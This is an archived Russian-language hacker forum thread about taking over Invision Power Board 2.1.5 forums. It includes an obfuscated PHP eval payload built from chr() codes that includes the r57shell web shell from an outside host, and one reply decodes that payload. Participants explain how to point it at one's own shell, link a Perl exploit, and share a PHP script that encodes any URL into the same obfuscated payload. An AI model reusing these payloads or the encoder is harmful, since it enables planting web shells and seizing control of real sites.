PDA

Просмотр полной версии : Проблема с шеллом rst

_Sniper_
16.08.2007, 15:51
Смотрел видео..типо как получить админку в IPB 2.1.5
без использования сплойта.
Всё зделал как было написано (проверил на уязвимость index.php?act=task&ck=' )
Регюсь..логинюсь на форуме...создаю тему..
Содержание темы
eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(114). chr(115). chr(116). chr(46). chr(118). chr(111). chr(105). chr(100). chr(46). chr(114). chr(117). chr(47). chr(100). chr(111). chr(119). chr(110). chr(108). chr(111). chr(97). chr(100). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42). chr(32) ); //

Ну и т.д..ничего не работало т.к тот шелл уже с сервера удалён (rst)
Что можно зделать? Как "перекодировать" ссылку (ведь она мертва) на СВОЙ шелл..
Жду помощи.
+toxa+
16.08.2007, 16:10
Ну ты кнешн в нужном месте создал тему.
https://forum.antichat.ru/showpost.php?p=437257&postcount=11
А®ТеS
16.08.2007, 16:25
Обисняю. тут ASCII коды символов. Если это расшифровать то будет так:
include "http://rst.void.ru/download/r57shell.txt";/*
Тебе нужно изменить адрес ссылки и снова загнать в ASCII коды, можешь посмотреть соответствия по таблице или написать программку, это дело 5 минут :).
З.Ы. RST рулез, жаль что закрылись :(.
_Sniper_
16.08.2007, 16:25
Можно видео по юзанью? А то я чёт ничего не понял..


И ещё...посмотрите вот это видео.. по поводу этого шелла.
http://pro-hack.ru/download/video/files/Video_ipb.rar
А®ТеS
16.08.2007, 16:44
Видео по юзанью чего? КАк загонять в ASCII или сплоит ссылку на который дал +toxa+?))) Думаю что про сплоит, короче он перле, ставишь на машину ActivePERL и ноу проблем, в сплоите кстати есть комментарии и довольно подробные по юзанью. а теску ты и правда сунул малясь нетуда.
_Sniper_
16.08.2007, 17:27
Обисняю. тут ASCII коды символов. Если это расшифровать то будет так:
include "http://rst.void.ru/download/r57shell.txt";/*
Тебе нужно изменить адрес ссылки и снова загнать в ASCII коды, можешь посмотреть соответствия по таблице или написать программку, это дело 5 минут :).
З.Ы. RST рулез, жаль что закрылись :(.
Есть софт для шифровки\расшифровки? Или где можно зашифровать\расшифровать?
n1†R0x
16.08.2007, 18:22
Есть софт для шифровки\расшифровки? Или где можно зашифровать\расшифровать?
хз, есть или нет, накатал за 10 мин

<?php
print "<form method = 'post'><textarea name = 'string' cols = '100' rows = '20'></textarea><br /><br />";
print "<input type = 'submit' value = 'Send >>' /></form>";
if (isset($_POST["string"]))
{
print "eval( ";
for ($i=0; $i<strlen($string); $i++)
{
$arr[] = substr($string, $i, 1);
print "chr(".ord($arr[$i]).")";
($i+1 !== strlen($string)) ? print ". " : print " ";
}
print "); //";
}
?>
Должно работать

зы: в асю уже написали.. по поводу массива - конечно, можно и без него, просто у меня немного другие планы появились, пока писал скрипт)